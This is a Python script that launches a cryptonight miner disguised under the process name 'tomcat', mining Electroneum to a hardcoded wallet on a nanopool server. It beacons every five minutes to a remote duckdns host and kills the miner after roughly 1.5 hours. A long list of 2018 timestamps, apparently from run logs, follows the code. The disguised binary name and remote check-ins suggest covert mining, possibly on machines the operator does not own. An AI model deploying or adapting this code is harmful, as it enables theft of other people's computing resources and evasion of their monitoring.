import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:01.705772
#2018-02-17 17:39:07.555213
#2018-02-17 19:27:05.512411
#2018-02-17 21:17:01.246190
#2018-02-17 23:01:01.443332
#2018-02-18 00:48:05.254129
#2018-02-18 02:36:05.820541
#2018-02-18 04:23:01.348218
#2018-02-18 06:14:04.023177
#2018-02-18 08:03:05.565599
#2018-02-18 09:51:07.054529
#2018-02-18 11:38:02.213090
#2018-02-18 13:23:02.136920
#2018-02-18 15:13:03.879293
#2018-02-18 17:02:05.641437
#2018-02-18 18:49:04.187315
#2018-02-18 20:35:07.773209
#2018-02-18 22:21:03.424524
#2018-02-19 00:11:03.921106
#2018-02-19 01:57:05.659875
#2018-02-19 03:44:01.660788
#2018-02-19 05:30:03.896945
#2018-02-19 07:19:05.227932
#2018-02-19 09:08:06.544866
#2018-02-19 10:57:07.152241
#2018-02-19 12:44:06.424070
#2018-02-19 14:32:07.369180
#2018-02-19 16:20:01.630982
#2018-02-19 18:06:09.692621
#2018-02-19 19:55:02.184984
#2018-02-19 21:44:01.746684
#2018-02-19 23:32:04.540145
#2018-02-20 01:17:07.381011
#2018-02-20 03:06:04.318681
#2018-02-20 04:53:05.891947
#2018-02-20 06:36:05.571954
#2018-02-20 08:21:08.254081
#2018-02-20 10:07:01.808975
#2018-02-20 11:52:10.005656
#2018-02-20 13:40:01.845966
#2018-02-20 15:23:05.694969
#2018-02-20 17:09:08.390660
#2018-02-20 18:58:04.315607
#2018-02-20 20:49:03.807516
#2018-02-20 22:33:07.079076
#2018-02-21 00:14:04.104882
#2018-02-21 01:59:07.088608
#2018-02-21 03:47:07.177158
#2018-02-21 05:34:03.393024
#2018-02-21 07:23:01.928529
#2018-02-21 09:07:08.035846
#2018-02-21 10:55:08.426076
#2018-02-21 12:42:04.151489
#2018-02-21 14:31:01.648943
#2018-02-21 16:18:05.026947
#2018-02-21 18:09:10.468167
#2018-02-21 19:56:02.022560
#2018-02-21 21:43:05.743460
#2018-02-21 23:32:04.955279
#2018-02-22 01:21:07.151422
#2018-02-22 03:11:01.653489
#2018-02-22 04:56:07.197108
#2018-02-22 06:41:05.813675
#2018-02-22 08:30:01.622341
#2018-02-22 10:17:03.839280
#2018-02-22 12:02:04.294356
#2018-02-22 13:49:01.822326
#2018-02-22 15:37:06.165834
#2018-02-22 17:23:02.090604
#2018-02-22 19:11:07.123861
#2018-02-22 21:03:06.728290
#2018-02-22 22:49:01.264609
#2018-02-23 00:36:05.769714
#2018-02-23 02:20:01.655654
#2018-02-23 04:08:03.996734
#2018-02-23 05:50:06.098985
#2018-02-23 07:41:03.162486
#2018-02-23 09:46:04.381657
#2018-02-23 11:51:01.499607
#2018-02-23 13:40:08.390302
#2018-02-23 15:28:01.838401
#2018-02-23 17:17:06.981752
#2018-02-23 19:03:08.378054
#2018-02-23 20:48:07.242460
#2018-02-23 22:36:07.151282
#2018-02-24 00:22:05.792256
#2018-02-24 02:15:10.080239
#2018-02-24 04:04:02.063279
#2018-02-24 05:49:05.248055
#2018-02-24 07:36:01.722865
#2018-02-24 09:21:06.738343
#2018-02-24 11:15:07.420872
#2018-02-24 13:04:03.693790
#2018-02-24 14:54:03.907272
#2018-02-24 16:45:07.015743
#2018-02-24 18:33:06.016122
#2018-02-24 20:20:04.563387
#2018-02-24 22:15:03.852549
#2018-02-25 02:36:05.249763
#2018-02-25 06:19:04.230970
#2018-02-25 11:40:01.935994